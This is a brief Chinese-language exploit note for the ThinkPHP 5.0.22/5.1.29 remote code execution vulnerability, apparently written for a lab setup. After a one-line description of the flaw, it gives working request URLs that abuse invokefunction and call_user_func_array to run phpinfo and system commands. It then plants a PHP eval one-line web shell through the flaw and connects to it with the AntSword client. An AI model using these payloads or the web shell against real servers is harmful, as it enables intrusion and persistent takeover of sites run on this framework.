5.1.29 远程代码执行漏洞
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
漏洞描述
Thinkphp是一个国内轻量级的开发框架。由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
验证方式
直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:
直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=id
利用方式
- 一句话木马
echo '<?php @eval($_POST['hack']);?>' >> shell.php
- 上传一句话木马
http://127.0.0.1:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['hack']);?>' >> shell.php
- 使用蚁剑连接
http://10.10.10.154/shell.php
